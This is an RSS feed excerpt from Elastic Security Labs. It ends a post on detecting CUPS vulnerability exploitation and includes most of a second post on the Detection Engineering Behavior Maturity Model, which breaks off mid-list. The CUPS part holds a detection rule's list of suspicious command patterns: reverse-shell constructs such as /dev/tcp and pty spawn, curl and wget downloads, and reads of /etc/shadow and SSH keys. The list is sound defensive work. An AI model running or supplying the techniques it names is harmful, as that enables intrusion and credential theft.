  &quot;*cron*&quot;, &quot;*/etc/rc.local*&quot;, &quot;*/dev/tcp/*&quot;, &quot;*/etc/init.d*&quot;, 
  &quot;*/etc/update-motd.d*&quot;, &quot;*/etc/sudoers*&quot;,
  &quot;*/etc/profile*&quot;, &quot;*autostart*&quot;, &quot;*/etc/ssh*&quot;, &quot;*/home/*/.ssh/*&quot;, 
  &quot;*/root/.ssh*&quot;, &quot;*~/.ssh/*&quot;, &quot;*udev*&quot;, &quot;*/etc/shadow*&quot;, &quot;*/etc/passwd*&quot;,
    // Downloads
  &quot;*curl*&quot;, &quot;*wget*&quot;,

  // encoding and decoding
  &quot;*base64 *&quot;, &quot;*base32 *&quot;, &quot;*xxd *&quot;, &quot;*openssl*&quot;,

  // reverse connections
  &quot;*GS_ARGS=*&quot;, &quot;*/dev/tcp*&quot;, &quot;*/dev/udp/*&quot;, &quot;*import*pty*spawn*&quot;, &quot;*import*subprocess*call*&quot;, &quot;*TCPSocket.new*&quot;,
  &quot;*TCPSocket.open*&quot;, &quot;*io.popen*&quot;, &quot;*os.execute*&quot;, &quot;*fsockopen*&quot;, &quot;*disown*&quot;, &quot;*nohup*&quot;,

  // SO loads
  &quot;*openssl*-engine*.so*&quot;, &quot;*cdll.LoadLibrary*.so*&quot;, &quot;*ruby*-e**Fiddle.dlopen*.so*&quot;, &quot;*Fiddle.dlopen*.so*&quot;,
  &quot;*cdll.LoadLibrary*.so*&quot;,

  // misc. suspicious command lines
   &quot;*/etc/ld.so*&quot;, &quot;*/dev/shm/*&quot;, &quot;*/var/tmp*&quot;, &quot;*echo*&quot;, &quot;*&gt;&gt;*&quot;, &quot;*|*&quot;
)
</code></pre>
<p>By making an exception of the command lines as we did in the rule above, we can broaden the scope to also detect the <code>cupsd</code> parent, without the fear of false positives.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image2.png" alt="" /></p>
<p><a href="https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml">https://github.com/elastic/detection-rules/blob/a3e89a7fabe90a6f9ce02b58d5a948db8d231ee5/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml</a></p>
<h3>Elastic’s Attack Discovery</h3>
<p>In addition to prebuilt content published, <a href="https://www.elastic.co/es/guide/en/security/current/attack-discovery.html">Elastic’s Attack Discovery</a> can provide context and insights by analyzing alerts in your environment and identifying threats by leveraging Large Language Models (LLMs). In the following example, Attack Discovery provides a short summary and a timeline of the activity. The behaviors are then mapped to an attack chain to highlight impacted stages and help triage the alerts.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/image4.png" alt="Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability" title="Elastic’s Attack Discovery summarizing findings for the CUPS Vulnerability" /></p>
<h2>Conclusion</h2>
<p>The recent CUPS vulnerability disclosure highlights the evolving threat landscape, underscoring the importance of securing services like printing. With a high CVSS score, this issue calls for immediate action, particularly given how easily these flaws can be exploited remotely. Although the service is installed by default on some UNIX OS (based on supply chain), manual user interaction is needed to trigger the printer job. We recommend that users remain vigilant, continue hunting, and not underestimate the risk. While the threat requires user interaction, if paired with a spear phishing document, it may coerce victims to print using the rogue printer. Or even worse, silently replacing existing printers or installing new ones as <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Impact">indicated</a> by @evilsocket.</p>
<p>We expect more to be revealed as the initial disclosure was labeled part 1. Ultimately, visibility and detection capabilities remain at the forefront of defensive strategies for these systems, ensuring that attackers cannot exploit overlooked vulnerabilities.</p>
<h2>Key References</h2>
<ul>
<li><a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/">https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/</a></li>
<li><a href="https://github.com/RickdeJager/cupshax/blob/main/cupshax.py">https://github.com/RickdeJager/cupshax/blob/main/cupshax.py</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47076">https://www.cve.org/CVERecord?id=CVE-2024-47076</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47175">https://www.cve.org/CVERecord?id=CVE-2024-47175</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47176">https://www.cve.org/CVERecord?id=CVE-2024-47176</a></li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2024-47177">https://www.cve.org/CVERecord?id=CVE-2024-47177</a></li>
</ul>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/cups-overflow/cups-overflow.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elastic releases the Detection Engineering Behavior Maturity Model]]></title>
            <link>https://www.elastic.co/es/security-labs/elastic-releases-debmm</link>
            <guid>elastic-releases-debmm</guid>
            <pubDate>Fri, 06 Sep 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Using this maturity model, security teams can make structured, measurable, and iteritive improvements to their detection engineering teams..]]></description>
            <content:encoded><![CDATA[<h2>Detection Engineering Behavior Maturity Model</h2>
<p>At Elastic, we believe security is a journey, not a destination. As threats evolve and adversaries become more effective, security teams must continuously adapt and improve their processes to stay ahead of the curve. One of the key components of an effective security program is developing and managing threat detection rulesets. These rulesets are essential for identifying and responding to security incidents. However, the quality and effectiveness of these rulesets are directly influenced by the processes and behaviors of the security team managing them.</p>
<p>To address the evolving challenges in threat detection engineering and ensure consistent improvement across security teams, we have defined the <strong>Detection Engineering Behavior Maturity Model (DEBMM)</strong>. This model, complemented by other models and frameworks, provides a structured approach for security teams to consistently mature their processes and behaviors. By focusing on the team's processes and behaviors, the model ensures that detection rulesets are developed, managed, and improved effectively, regardless of the individual or the specific ruleset in question. This approach promotes a culture of continuous improvement and consistency in threat detection capabilities.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image5.png" alt="Detection Engineering Behavior Maturity Model" title="Detection Engineering Behavior Maturity Model" /></p>
<p>The Detection Engineering Behavior Maturity Model outlines five maturity tiers (Foundation, Basic, Intermediate, Advanced, and Expert) for security teams to achieve. Each tier builds upon the previous one, guiding teams through a structured and iterative process of enhancing their behaviors and practices. While teams may demonstrate behaviors at different tiers, skipping or deprioritizing criteria at the prior tiers is generally not recommended. Consistently meeting the expectations at each tier is crucial for creating a solid foundation for progression. However, measuring maturity over time becomes challenging as threats and technologies evolve, making it difficult to define maturity in an evergreen way. This model emphasizes continuous improvement rather than reaching a fixed destination, reflecting the ongoing nature of security work.</p>
<p>Note it is possible, and sometimes necessary, to attempt the behaviors of a higher tier in addition to the behaviors of your current tier. For example, attempting to enhance Advanced TTP Coverage may cover an immediate risk or threat, further cultivating expertise among engineers at the basic level.  This flexibility ensures that security teams can prioritize critical improvements and adapt to evolving threats without feeling constrained by the need to achieve perfection at each level. The dual dimensions of maturity ensure a balanced approach, fostering a culture of ongoing enhancement and adaptability. Additionally, the model is designed to complement well-adopted frameworks in the security domain, adding unique value by focusing on the maturity of the team's processes and behaviors that underpin effective detection ruleset management.</p>
<table>
<thead>
<tr>
<th align="center">Model/Framework</th>
<th align="center">Focus</th>
<th align="center">Contribution of the DEBMM</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center">Hunting Maturity Model [<a href="https://www.sans.org/tools/hunting-maturity-model/">REF</a>]</td>
<td align="center">Proactive threat hunting practices and processes for improving threat detection capabilities.</td>
<td align="center">Enhances the proactive aspects by integrating regular and systematic threat-hunting activities into the ruleset development and management process.</td>
</tr>
<tr>
<td align="center">NIST Cybersecurity Framework (NIST CSF) [<a href="https://www.nist.gov/cyberframework">REF</a>]</td>
<td align="center">Identifying, Protecting, Detecting, Responding, and Recovering from cybersecurity threats.</td>
<td align="center">Enhances the 'Detect' function by offering a structured model specifically for detection ruleset maturity, aligning with NIST CSF's core principles and providing detailed criteria and measures for detection capabilities. It also leverages the Maturity Levels—initial, Repeatable, Defined, Managed, and Optimized.</td>
</tr>
<tr>
<td align="center">MITRE ATT&amp;CK Framework [<a href="https://attack.mitre.org/">REF</a>]</td>
<td align="center">Describes common tactics, techniques, and procedures (TTPs) threat actors use.</td>
<td align="center">Supports creating, tuning, and validating detection rules that align with TTPs, ensuring comprehensive threat coverage and effective response mechanisms.</td>
</tr>
<tr>
<td align="center">ISO/IEC 27001 [<a href="https://www.iso.org/obp/ui/en/#iso:std:iso-iec:27001:ed-3:v1:en">REF</a>]</td>
<td align="center">Information security management systems (ISMS) and overall risk management.</td>
<td align="center">Contributes to the 'Detect' and 'Respond' domains by ensuring detection rules are systematically managed and continuously improved as part of an ISMS.</td>
</tr>
<tr>
<td align="center">SIM3 v2 – Security Incident Management Maturity Model [<a href="https://opencsirt.org/wp-content/uploads/2023/11/SIM3_v2_interim_standard.pdf">REF</a>]</td>
<td align="center">Maturity of security incident management processes.</td>
<td align="center">Integrates structured incident management practices into detection ruleset management, ensuring clear roles, documented procedures, effective communication, and continuous improvement.</td>
</tr>
<tr>
<td align="center">Detection Engineering Maturity Matrix [<a href="https://detectionengineering.io">REF</a>]</td>
<td align="center">Defines maturity levels for detection engineering, focusing on processes, technology, and team skills.</td>
<td align="center">Provides behavioral criteria and a structured approach to improving detection engineering processes.</td>
</tr>
</tbody>
</table>
<p>Among the several references listed in the table, the Detection Engineering Maturity Matrix is the closest related, given its goals and methodologies. The matrix defines precise maturity levels for processes, technology, and team skills, while the DEBMM builds on this foundation by emphasizing continuous improvement in engineering behaviors and practices. Together, they offer a comprehensive approach to advancing detection engineering capabilities, ensuring structural and behavioral excellence in managing detection rulesets while describing a common lexicon.</p>
<p><strong>A Small Note on Perspectives and the Importance of the Model</strong></p>
<p>Individuals with diverse backgrounds commonly perform detection engineering. People managing detecting engineering processes must recognize and celebrate the value of diverse backgrounds; DEBMM is about teams of individuals, vendors, and users, each bringing different viewpoints to the process. This model lays the groundwork for more robust frameworks to follow, complementing existing ones previously mentioned while considering other perspectives.</p>
<h3>What is a threat detection ruleset?</h3>
<p>Before we dive into the behaviors necessary to mature our rulesets, let's first define the term. A threat detection ruleset is a group of rules that contain information and some form of query logic that attempts to match specific threat activity in collected data. These rules typically have a schema, information about the intended purpose, and a query formatted for its specific query language to match threat behaviors. Below are some public examples of threat detection rulesets:</p>
<ul>
<li>Elastic:  <a href="https://github.com/elastic/detection-rules">Detection Rules</a> | <a href="https://github.com/elastic/protections-artifacts">Elastic Defend Rules</a></li>
<li>Sigma: <a href="https://github.com/SigmaHQ/sigma">Sigma Rules</a></li>
<li>DataDog: <a href="https://docs.datadoghq.com/security/detection_rules/">Detection Rules</a></li>
<li>Splunk: <a href="https://research.splunk.com/detections/">Detections</a></li>
<li>Panther: <a href="https://github.com/panther-labs/panther-analysis">Detection Rules</a></li>
</ul>
<p>Detection rulesets often fall between simple Indicator of Compromise (IOC) matching and programmable detections, such as those written in Python for Panther. They balance flexibility and power, although they are constrained by the detection scripting language's design biases and the detection engine's features. It is important to note that this discussion is focused on search-based detection rules typically used in SIEM (Security Information and Event Management) systems. Other types of detections, including on-stream and machine learning-based detections, can complement SIEM rules but are not explicitly covered by this model.</p>
<p>Rulesets can be further categorized based on specific criteria. For example, one might assess the Amazon Web Services (AWS) ruleset in Elastic’s Detection Rules repository rather than rules based on all available data sources. Other categories might include all cloud-related rulesets, credential access rulesets, etc.</p>
<h3>Why ruleset maturity is important</h3>
<p><strong>Problem:</strong> It shouldn't matter which kind of ruleset you use; they all benefit from a system that promotes effectiveness and rigor. The following issues are more prominent if you're using an ad-hoc or nonexistent system of maturity:</p>
<ul>
<li>SOC Fatigue and Low Detection Accuracy: The overwhelming nature of managing high volumes of alerts, often leading to burnout among SOC analysts, is compounded by low-fidelity detection logic and high false positive (FP) rates, resulting in a high number of alerts that are not actual threats and do not accurately identify malicious activity.</li>
<li>Lack of Contextual Information and Poor Documentation: Detection rules that trigger alerts without sufficient contextual information to understand the event's significance or lack of guidance for the course of action, combined with insufficient documentation for detection rules, including their purpose, logic, and expected outcomes.</li>
<li>Inconsistent Rule Quality: Variability in the quality and effectiveness of detection rules.</li>
<li>Outdated Detection Logic: Detection rules must be updated to reflect the latest threat intelligence and attack techniques.</li>
<li>Overly Complex Rules: Detection rules that are too complex, making them difficult to maintain and understand.</li>
<li>Lack of Automation: Reliance on manual processes for rule updates, alert triage, and response.</li>
<li>Inadequate Testing and Validation: Detection rules must be thoroughly tested and validated before deployment.</li>
<li>Inflexible Rulesets: Detection rules that are not adaptable to environmental changes or new attack techniques.</li>
<li>Lack of Metrics, Measurement, and Coverage Insights: More metrics are needed to measure the effectiveness, performance, and coverage of detection rules across different areas.</li>
<li>Siloed Threat Intelligence: Threat intelligence must be integrated with detection rules, leading to fragmented and incomplete threat detection.</li>
<li>Inability to Prioritize New Rule Creation: Without a maturity system, teams might focus on quick wins or more exciting areas rather than what is needed.</li>
</ul>
<p><strong>Opportunity:</strong> This model encourages a structured approach to developing, managing, improving, and maintaining quality detection rulesets, helping security teams to:</p>
<ul>
<li>Reduce SOC fatigue by optimizing alert volumes and improving accuracy.</li>
<li>Enhance detection fidelity with regularly updated and well-tested rules.</li>
<li>Ensure consistent and high-quality detection logic across the entire ruleset.</li>
<li>Integrate contextual information and threat intelligence for more informed alerting.</li>
<li>Automate routine processes to improve efficiency and reduce manual errors.</li>
<li>Continuously measure and improve the performance of detection rules.</li>
<li>Stay ahead of threats, maintain effective detection capabilities, and enhance their overall security posture.</li>
</ul>
<h3>Understanding the DEBMM Structure</h3>
<p>DEBMM is segmented into <strong>tiers</strong> related to <strong>criteria</strong> to <strong>quantitatively and qualitatively</strong> convey maturity across different <strong>levels</strong>, each contributing to clear progression outcomes. It is designed to guide security teams through a structured set of behaviors to develop, manage, and maintain their detection rulesets.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image2.png" alt="DEBMM Tier Structure" title="DEBMM Tier Structure" /></p>
<h4>Tiers</h4>
<p>The DEBMM employs a multidimensional approach to maturity, encompassing both high-level tiers and granular levels of behaviors within each tier. The first dimension involves the overall maturity tiers, where criteria should be met progressively to reflect overall maturity. The second dimension pertains to the levels of behaviors within each tier, highlighting specific practices and improvements that convey maturity. This structure allows for flexibility and recognizes that maturity can be demonstrated in various ways. The second dimension loosely aligns with the NIST Cybersecurity Framework (CSF) maturity levels (Initial, Repeatable, Defined, Managed, and Optimized), providing a <em>familiar reference point</em> for security teams. For instance, the qualitative behaviors and quantitative measurements within each DEBMM tier mirror the iterative refinement and structured process management advocated by the NIST CSF. By aligning with these principles, the DEBMM ensures that as teams progress through its tiers, they also embody the best practices and structured approach seen in the NIST CSF.</p>
<p>At a high level, the DEBMM consists of five maturity tiers, each building upon the previous one:</p>
<ol>
<li><strong>Tier 0: Foundation</strong> - No structured approach to rule development and management. Rules are created and maintained ad-hoc, with little documentation, peer review, stakeholder communication, or personnel training.</li>
<li><strong>Tier 1: Basic</strong> - Establishment of baseline rules, systematic rule management, version control, documentation, regular reviews of the threat landscape, and initial personnel training.</li>
<li><strong>Tier 2: Intermediate</strong> - Focus on continuously tuning rules to reduce false positives, identifying and documenting gaps, thorough internal testing and validation, and ongoing training and development for personnel.</li>
<li><strong>Tier 3: Advanced</strong> - Systematic identification and ensuring that legitimate threats are not missed (false negatives), engaging in external validation of rules, covering advanced TTPs, and advanced training for analysts and security experts.</li>
<li><strong>Tier 4: Expert</strong> - This level is characterized by advanced automation, seamless integration with other security tools, continuous improvement through regular updates and external collaboration, and comprehensive training programs for all levels of security personnel. Proactive threat hunting plays a crucial role in maintaining a robust security posture. It complements the ruleset, enhancing the management process by identifying new patterns and insights that can be incorporated into detection rules. Additionally, although not commonly practiced by vendors, detection development as a post-phase of incident response can provide valuable insights and enhance the overall effectiveness of the detection strategy.</li>
</ol>
<p>It's ideal to progress through these tiers following an approach that best meets the security team's needs (e.g., sequentially, prioritizing by highest risk, etc.). Progressing through the tiers comes with increased operational costs, and rushing through the maturity model without proper budget and staff can lead to burnout and worsen the situation. Skipping foundational practices in the lower tiers can undermine the effectiveness of more advanced activities in the higher tiers.</p>
<p>Consistently meeting the expectations at each tier ensures a solid foundation for moving to the next level. Organizations should strive to iterate and improve continuously, recognizing that maturity is dynamic. The expert level represents an advanced state of maturity, but it is not the final destination. It requires ongoing commitment and adaptation to stay at that level. Organizations may experience fluctuations in their maturity level depending on the frequency and accuracy of assessments. This is why the focus should be on interactive development and recognize that different maturity levels within the tiers may be appropriate based on the organization's specific needs and resources.</p>
<h4>Criteria and Levels</h4>
<p>Each tier is broken down into specific criteria that security teams must meet. These criteria encompass various aspects of detection ruleset management, such as rule creation, management, telemetry quality, threat landscape review, stakeholder engagement, and more.</p>
<p>Within each criterion, there are qualitative behaviors and quantitative measurements that define the levels of maturity:</p>
<ul>
<li><strong>Qualitative Behaviors—State of Ruleset:</strong> These subjective assessments are based on the quality and thoroughness of the ruleset and its documentation. They provide a way to evaluate the current state of the ruleset, helping threat researchers and detection engineers **understand and articulate the maturity of their ruleset in a structured manner. While individual perspectives can influence these behaviors and may vary between assessors, they are helpful for initial assessments and for providing detailed insights into the ruleset's state.</li>
<li><strong>Quantitative Measurements - Activities to Maintain State</strong>: These provide a structured way to measure the activities and processes that maintain or improve the ruleset. They are designed to be more reliable for comparing the maturity of different rulesets and help track progress over time. While automation can help measure these metrics consistently, reflecting the latest state of maturity, each organization needs to define the ideal for its specific context. The exercise of determining and calculating these metrics will contribute significantly to the maturity process, ensuring that the measures are relevant and tailored to the unique needs and goals of the security team. Use this model as guidance, but establish and adjust specific calculations and metrics according to your organizational requirements and objectives.</li>
</ul>
<p>Similar to Tiers, each level within the qualitative and quantitative measurements builds upon the previous one, indicating increasing maturity and sophistication in the approach to detection ruleset management. The goal is to provide clear outcomes and a roadmap for security teams to systematically and continuously improve their detection rulesets.</p>
<h4>Scope of Effort to Move from Basic to Expert</h4>
<p>Moving from the basic to the expert tier involves a significant and sustained effort. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation. This journey demands commitment, continuous learning, and adaptation to the evolving threat landscape.</p>
<h4>Tier 0: Foundation</h4>
<p>Teams must build a structured approach to rule development and management at the foundational tier. Detection rules may start out being created and maintained ad hoc, with little to no peer review, and often needing proper documentation and stakeholder communication. Threat modeling initially rarely influences the creation and management of detection rules, resulting in a reactive rather than proactive approach to threat detection. Additionally, there may be little to no roadmap documented or planned for rule development and updates, leading to inconsistent and uncoordinated efforts.</p>
<p>Establishing standards for what defines a good detection rule is essential to guiding teams toward higher maturity levels. It is important to recognize that a rule may not be perfect in its infancy and will require continuous improvement over time. This is acceptable if analysts are committed to consistently refining and enhancing the rule. We provide recommendations on what a good rule looks like based on our experience, but organizations must define their perfect rule considering their available capabilities and resources.</p>
<p>Regardless of the ruleset, a rule should include specific fields that ensure its effectiveness and accuracy. Different maturity levels will handle these fields with varying completeness and accuracy. While more content provides more opportunities for mistakes, the quality of a rule should improve with the maturity of the ruleset. For example, a better query with fewer false positives, more descriptions with detailed information, and up-to-date MITRE ATT&amp;CK information are indicators of higher maturity.</p>
<p>By establishing and progressively improving these criteria, teams can enhance the quality and effectiveness of their detection rulesets. Fundamentally, it starts with developing, managing, and maintaining a single rule. Creating a roadmap for rule development and updates, even at the most basic level, can provide direction and ensure that improvements are systematically tracked and communicated. Most fields should be validated against a defined schema to provide consistency. For more details, see the <a href="#Example-Rule-Metadata">Example Rule Fields</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image6.png" alt="DEBMM - Tier 0" title="DEBMM - Tier 0" /></p>
<h5>Criteria</h5>
<h6>Structured Approach to Rule Development and Management</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No structured approach; rules created randomly without documentation.</li>
<li>Repeatable: Minimal structure; some rules are created with primary documentation.</li>
<li>Defined: Standardized process for rule creation with detailed documentation and alignment with defined schemas.</li>
<li>Managed: Regularly reviewed and updated rules, ensuring consistency and adherence to documented standards, with stakeholder involvement.</li>
<li>Optimized: Continuous improvement based on feedback and evolving threats, with automated rule creation and management processes.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal activities for rule creation.</li>
<li>Repeatable: Sporadic creation of rules with minimal oversight or review; less than 20% of rules have complete documentation; less than 10% of rules are aligned with a defined schema; rules created do not undergo any formal approval process.</li>
<li>Defined: Regular creation and documentation of rules, with 50-70% alignment to defined schemas and peer review processes.</li>
<li>Managed: Comprehensive creation and management activities, with 70-90% of rules having complete documentation and formal approval processes.</li>
<li>Optimized: Fully automated and integrated rule creation and management processes, with 90-100% alignment to defined schemas and continuous documentation updates.</li>
</ul>
</li>
</ul>
<h6>Creation and Maintenance of Detection Rules</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: Rules created and modified ad hoc, without version control.</li>
<li>Repeatable: Occasional updates to rules, but still need a systematic process.</li>
<li>Defined: Systematic process for rule updates, including version control and regular documentation.</li>
<li>Managed: Regular, structured updates with detailed documentation, version control, and stakeholder communication.</li>
<li>Optimized: Continuous rule improvement with automated updates, comprehensive documentation, and proactive stakeholder engagement.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal activities are required to maintain detection rules.</li>
<li>Repeatable: Rules are updated sporadically, with less than 50% of rules reviewed annually; more than 30% of rules have missing or incomplete descriptions, references, or documentation; less than 20% of rules are peer-reviewed; less than 20% of rules include escalation procedures or guides; less than 15% of rules have associated metadata for tracking rule effectiveness and modifications.</li>
<li>Defined: Regular updates with 50-70% of rules reviewed annually; detailed descriptions, references, and documentation for most rules; 50% of rules are peer-reviewed.</li>
<li>Managed: Comprehensive updates with 70-90% of rules reviewed annually; complete descriptions, references, and documentation for most rules; 70% of rules are peer-reviewed.</li>
<li>Optimized: Automated updates with 90-100% of rules reviewed annually; thorough descriptions, references, and documentation for all rules; 90-100% of rules are peer-reviewed and include escalation procedures and guides.</li>
</ul>
</li>
</ul>
<h6>Roadmap Documented or Planned</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No roadmap documented or planned for rule development and updates.</li>
<li>Repeatable: A basic roadmap exists for some rules, with occasional updates and stakeholder communication.</li>
<li>Defined: A comprehensive roadmap is documented for most rules, with regular updates and stakeholder involvement.</li>
<li>Managed: Detailed, regularly updated roadmap covering all rules, with proactive stakeholder communication and involvement.</li>
<li>Optimized: Dynamic, continuously updated roadmap integrated into organizational processes, with full stakeholder engagement and alignment with strategic objectives.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No documented roadmap for rule development and updates.</li>
<li>Repeatable: Basic roadmap documented for less than 30% of rules; fewer than two roadmap updates or stakeholder meetings per year; less than 20% of rules have a planned update schedule; no formal process for tracking roadmap progress.</li>
<li>Defined: Roadmap documented for 50-70% of rules; regular updates and stakeholder meetings; 50% of rules have a planned update schedule.</li>
<li>Managed: Comprehensive roadmap for 70-90% of rules; frequent updates and stakeholder meetings; 70% of rules have a planned update schedule and tracked progress.</li>
<li>Optimized: Fully integrated roadmap for 90-100% of rules; continuous updates and proactive stakeholder engagement; 90-100% of rules have a planned update schedule with formal tracking processes.</li>
</ul>
</li>
</ul>
<h6>Threat Modeling Performed</h6>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No threat modeling was performed.</li>
<li>Repeatable: Occasional, ad-hoc threat modeling with minimal impact on rule creation without considering data and environment specifics.</li>
<li>Defined: Regular threat modeling with structured processes influencing rule creation, considering data and environment specifics.</li>
<li>Managed: Comprehensive threat modeling integrated into rule creation and updates, with detailed documentation and stakeholder involvement.</li>
<li>Optimized: Continuous, proactive threat modeling with real-time data integration, influencing all aspects of rule creation and management with full stakeholder engagement.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: No formal threat modeling activities.</li>
<li>Repeatable: Sporadic threat modeling efforts; less than one threat modeling exercise conducted per year with minimal documentation or impact analysis; threat models are reviewed or updated less than twice a year; less than 10% of new rules are based on threat modeling outcomes, and data and environment specifics are not consistently considered.</li>
<li>Defined: Regular threat modeling efforts; one to two annual exercises with detailed documentation and impact analysis; threat models reviewed or updated quarterly; 50-70% of new rules are based on threat modeling outcomes.</li>
<li>Managed: Comprehensive threat modeling activities; three to four exercises conducted per year with thorough documentation and impact analysis; threat models reviewed or updated bi-monthly; 70-90% of new rules are based on threat modeling outcomes.</li>
<li>Optimized: Continuous threat modeling efforts; monthly exercises with real-time documentation and impact analysis; threat models reviewed or updated continuously; 90-100% of new rules are based on threat modeling outcomes, considering data and environment specifics.</li>
</ul>
</li>
</ul>
<h4>Tier 1: Basic</h4>
<p>The basic tier involves creating a baseline of rules to cover fundamental threats. This includes differentiating between baseline rules for core protection and other supporting rules. Systematic rule management, including version control and documentation, is established. There is a focus on improving and maintaining telemetry quality and reviewing threat landscape changes regularly. At Elastic, we have always followed a Detections as Code (DAC) approach to rule management, which has helped us maintain our rulesets. We have recently exposed some of our internal capabilities and <a href="https://dac-reference.readthedocs.io/en/latest/">documented core DAC principles</a> for the community to help improve your workflows.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/image8.png" alt="DEBMM - Tier 1" title="DEBMM - Tier 1" /></p>
<h5>Criteria</h5>
<p><strong>Creating a Baseline</strong></p>
<p>Creating a baseline of rules involves developing a foundational set of rules to cover basic threats. This process starts with understanding the environment and the data available, ensuring that the rules are tailored to the specific needs and capabilities of the organization. The focus should be on critical tactics such as initial access, execution, persistence, privilege escalation, command &amp; control, and critical assets determined by threat modeling and scope. A baseline is defined as the minimal rules necessary to detect critical threats within these tactics or assets, recognizing that not all techniques may be covered. Key tactics are defined as the initial stages of an attack lifecycle where attackers gain entry, establish a foothold, and escalate privileges to execute their objectives. Major threats are defined as threats that can cause significant harm or disruption to the organization, such as ransomware, data exfiltration, and unauthorized access. Supporting rules, such as Elastic’s Building Block Rules (BBR), help enhance the overall detection capability.</p>
<p>Given the evolution of SIEM and the integration of Endpoint Detection and Response (EDR) solutions, there is an alternative first step for users who utilize an EDR. Only some SIEM users have an EDR, so this step may only apply to some, but organizations should validate that their EDR provides sufficient coverage of basic TTPs. Once this validation is complete, you may supplement that coverage for specific threats of concern based on your environment. Identify high-value assets and profile what typical host and network behavior looks like for them. Develop rules to detect deviations, such as new software installations or unexpected network connections, to ensure a comprehensive security posture tailored to your needs.</p>
<p>Comprehensive documentation goes beyond basic descriptions to include detailed explanations, investigative steps, and context about each rule. For example, general documentation states the purpose of a rule and its query logic. In contrast, comprehensive documentation provides an in-depth analysis of the rule's intent, the context of its application, detailed steps for investigation, potential false positives, and related rules. Comprehensive documentation ensures that security analysts have all the necessary information to effectively utilize and maintain the rule, leading to more accurate and actionable detections.</p>
<p>It would begin with an initial context explaining the technology behind the rule, outlining the risks and why the user should care about them, and detailing what the rule does and how it operates. This would be followed by possible investigation steps, including triage, scoping, and detailed investigation steps to analyze the alert thoroughly. A section on false positive analysis also provides steps to identify and mitigate false positives, ensuring the rule's accuracy and reliability. The documentation would also list related rules, including their names and IDs, to provide a comprehensive view of the detection landscape. Finally, response and remediation actions would be outlined to guide analysts in containing, remediating, and escalating the alert based on the triage results, ensuring a swift and effective response to detected threats. Furthermore, a setup guide section would be added to explain any prerequisite setup information needed to properly function, ensuring that users have all the necessary configuration details before deploying the rule.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: A few baseline rules are created to set the foundation for the ruleset.</li>
<li>Repeatable: Some baseline rules were created covering key tactics (initial access, execution, persistence, privilege escalation, and command and control) for well-documented threats.</li>
<li>Defined: Comprehensive baseline rules covering significant threats (e.g., ransomware, data exfiltration, unauthorized access) created and documented.</li>
<li>Managed: Queries and rules are validated against the defined schema that aligns with the security product before release.</li>
<li>Optimized: Continuous improvement and fine-tuning baseline rules with advanced threat modeling and automation.</li>
</ul>
</li>
<li>Quantitative Measurements - Activities to Maintain State:
<ul>
<li>Initial: 5-10 baseline rules created and documented per ruleset (e.g., AWS S3 ruleset, AWS Lambda ruleset, Azure ruleset, Endpoint ruleset).</li>
<li>Repeatable: More than ten baseline rules are created and documented per ruleset, covering major techniques based on threat modeling (e.g., probability of targeting, data source availability, impact on critical assets); at least 10% of rules go through a diagnostic phase.</li>
<li>Defined: A significant percentage (e.g., 60-70%) baseline of ATT&amp;CK techniques covered per data source​​; 70-80% of rules tested as diagnostic (beta) rules before production; regular updates and validation of rules.</li>
<li>Managed: 90% or more of baseline ATT&amp;CK techniques covered per data source; 100% of rules undergo a diagnostic phase before production; comprehensive documentation and continuous improvement processes are in place.</li>
<li>Optimized: 100% coverage of baseline ATT&amp;CK techniques per data source; automated diagnostic and validation processes for all rules; continuous integration and deployment (CI/CD) for rule updates.</li>
</ul>
</li>
</ul>
<h6>Managing and Maintaining Rulesets</h6>
<p>A systematic approach to managing and maintaining rules, including version control, documentation, and validation.</p>
<ul>
<li>Qualitative Behaviors - State of Ruleset:
<ul>
<li>Initial: No rule management.</li>
<li>Repeatable: Occasional rule processes with some documentation and a recurring release cycle for rules.</li>
<li>Defined: Regular rule management with comprehensive documentation and version control.</li>
